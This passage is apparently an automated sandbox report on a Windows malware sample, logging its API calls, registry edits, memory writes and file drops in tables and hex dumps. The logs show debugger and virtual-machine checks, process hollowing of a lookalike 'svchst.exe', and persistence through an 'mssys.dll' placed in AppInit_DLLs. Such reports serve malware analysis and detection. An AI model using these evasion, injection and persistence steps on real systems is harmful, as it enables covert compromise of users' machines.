00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Identifier buffer overflow 4 4137DC RegQueryValueExA
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Identifier success or wait 4 4137DC RegQueryValueExA
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System SystemBiosVersion success or wait 1 4137DC RegQueryValueExA

Mutex Activities

Name Completion Count Source Address Symbol

Process Activities

PID Filepath Cmdline Flags Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe C:\WINDOWS\svchst.exe none success or wait 1 4144EC CreateProcessA
PID Path Process info class Completion Count Source Address Symbol
1508 C:\WINDOWS\svchst.exe DebugPort success or wait 2 41226C CheckRemoteDebuggerPresent
1508 C:\WINDOWS\svchst.exe DebugObjectHandle port not set 1 412221 NtQueryInformationProcess
1508 C:\WINDOWS\svchst.exe DebugFlags success or wait 1 412238 NtQueryInformationProcess

Thread Activities

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
1700 1508 7C8106F9 414DC0 C:\WINDOWS\svchst.exe success or wait 1 414B7C CreateThread
1640 1508 7C8106F9 413ED0 C:\WINDOWS\svchst.exe success or wait 1 414B7C CreateThread
1152 1508 7C8106F9 4153C0 C:\WINDOWS\svchst.exe success or wait 1 414B7C CreateThread
TID PID DR0 DR1 DR2 DR3 DR7 EFLAGs EIP Completion Count Source Address Symbol
1136 1616 0 0 0 0 0 0 0 success or wait 1 41456C SetThreadContext
TID PID Path Completion Count Source Address Symbol
1136 1616 C:\WINDOWS\svchst.exe success or wait 1 414588 ResumeThread
TID Delay Completion Count Source Address Symbol
1152 -120s success or wait 1 414198 Sleep
1152 -120s unknown 1 414198 Sleep
TID PID Completion Count Source Address Symbol

Memory Activities

PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Value Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe 400000 4096 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 414548 WriteProcessMemory
1616 C:\WINDOWS\svchst.exe 426000 73216 2E 66 FE FF 04 10 40 00 03 07 42 6F 6F 6C 65 61 6E 01 00 04 15 FF DD F6 FF 05 46 61 6C 73 65 04 54 72 75 65 8D 0D 2C 11 01 07 49 6E 74 65 67 65 72 FE BB 6F BB 04 21 80 FF 00 7F 8B C0 44 17 0A 06 53 74 72 69 6E 67 98 EF BD 41 E6 0B 00 1F 3A 0B 4D D3 74 CB 14 39 20 03 24 28 1C A0 EE BF 69 96 36 BC F8 07 54 4F 62 6A 65 63 74 A4 33 DB 6D D9 B0 07 0C 60 71 79 73 8A 6D 64 FF DD 6D 08 C4 12 0F 0A 49 98 72 66 61 63 65 C1 DB 41 CE BE 00 C0 2D 46 03 00 B2 CC 4F 32 D9 FF 83 44 24 04 F8 E9 11 00 49 64 09 8C A0 CC CC 21 9B FD BA F1 50 FB FE 11 40 48 4B 76 0D 41 BA 11 17 08 17 8C 0E 1D 11 C8 DD B7 C2 F7 1F 0C F3 4C 10 40 2F 79 C9 E5 3C 59 48 59 58 59 11 54 FD 85 D9 64 C6 64 F0 5F FF 25 B8 E1 42 00 20 83 0C F2 07 B4 B0 AC 83 0C 32 C8 A8 A4 A0 9C 0C 32 C8 20 98 94 90 32 success or wait 1 414548 WriteProcessMemory
1616 C:\WINDOWS\svchst.exe 438000 1024 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 02 00 06 00 00 00 20 00 00 80 0A 00 00 00 80 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 07 00 FA 0F 00 00 68 00 00 80 FB 0F 00 00 90 00 00 80 FC 0F 00 00 B8 00 00 80 FD 0F 00 00 E0 00 00 80 FE 0F 00 00 08 01 00 80 FF 0F 00 00 30 01 00 80 00 10 00 00 58 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 80 00 00 00 18 42 03 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 A8 00 00 00 70 44 03 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 D0 00 00 00 C4 46 03 00 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 F8 00 00 00 B0 47 03 00 98 01 00 success or wait 1 414548 WriteProcessMemory
1616 C:\WINDOWS\svchst.exe 7FFDF008 4 00 00 40 00 success or wait 1 414548 WriteProcessMemory
PID Filepath Base Length Protection Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe 400000 12FAB0 page read and write success or wait 1 414518 VirtualAllocEx
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:52 0 2 0
09:39:53 1 4 1
09:39:54 1 4 1
09:39:58 1 4 1
09:40:00 1 4 1
09:40:01 1 4 1
09:40:33 1 4 1
09:41:53 1 4 1

System Activities

System info class Completion Count Source Address Symbol
ProcessInformation success or wait 7 4136BC CreateToolhelp32Snapshot

Timing Activities

Time Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
System info queried Type: ProcessInformation success or wait 544397905
System info queried Type: ProcessInformation success or wait 544482520
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 544545599
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 544545810
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 544548710
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 544548926
System info queried Type: ProcessInformation success or wait 544549695
System info queried Type: ProcessInformation success or wait 544613958
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 544683700
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 544686578
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 544686793
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 544686998
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System Name: SystemBiosVersion success or wait 544688175
System info queried Type: ProcessInformation success or wait 544691725
System info queried Type: ProcessInformation success or wait 544753251
System info queried Type: ProcessInformation success or wait 544812853
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 success or wait 545190128
Directory Information Queried Path: C:\WINDOWS\Temp Disposition: BothDirectoryInformation Filemask: <.exe no such file 545191891
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 00 00 success or wait 545211362
Directory Information Queried Path: C:\WINDOWS\Web Disposition: BothDirectoryInformation Filemask: <.exe no such file 545215419
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 00 00 success or wait 545227904
Process information queried Path: C:\WINDOWS\svchst.exe PID: 1508 Info Class: DebugPort success or wait 545235373
Process information queried Path: C:\WINDOWS\svchst.exe PID: 1508 Info Class: DebugPort success or wait 545235734
Process information queried Path: C:\WINDOWS\svchst.exe PID: 1508 Info Class: DebugObjectHandle port not set 545235844
Process information queried Path: C:\WINDOWS\svchst.exe PID: 1508 Info Class: DebugFlags success or wait 545235955
File created Path: C:\WINDOWS\mssys.dll Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: system Content Overwritten: true object name collision 545236607
File write Path: 1508 Offset: unknown Length: 67072 Value: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 40 00 c3 b2 21 6e 90 b2 21 6e 90 b2 21 6e 90 ac 73 ea 90 90 21 6e 90 ac 73 fb 90 a2 21 6e 90 ac 73 ed 90 df 21 6e 90 95 e7 15 90 b1 21 6e 90 b2 21 6f 90 d3 21 6e 90 ac 73 e7 90 b5 21 6e 90 ac 73 ff 90 b3 21 6e 90 52 69 63 68 b2 21 6e 90 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 34 88 4f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 00 01 00 00 10 00 00 00 b0 05 invalid handle 545271016
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Name: AppInit_DLLs Type: unicode Data: C:\WINDOWS\mssys.dll Old data: success or wait 545274488
Thread created PID: 1508 TID: 1700 EIP: 7C8106F9 EAX: 414DC0 Imagepath: C:\WINDOWS\svchst.exe success or wait 547138775
Thread created PID: 1508 TID: 1640 EIP: 7C8106F9 EAX: 413ED0 Imagepath: C:\WINDOWS\svchst.exe success or wait 547359102
Thread created PID: 1508 TID: 1152 EIP: 7C8106F9 EAX: 4153C0 Imagepath: C:\WINDOWS\svchst.exe success or wait 547363423
File opened Path: z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547364746
File opened Path: z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547365659
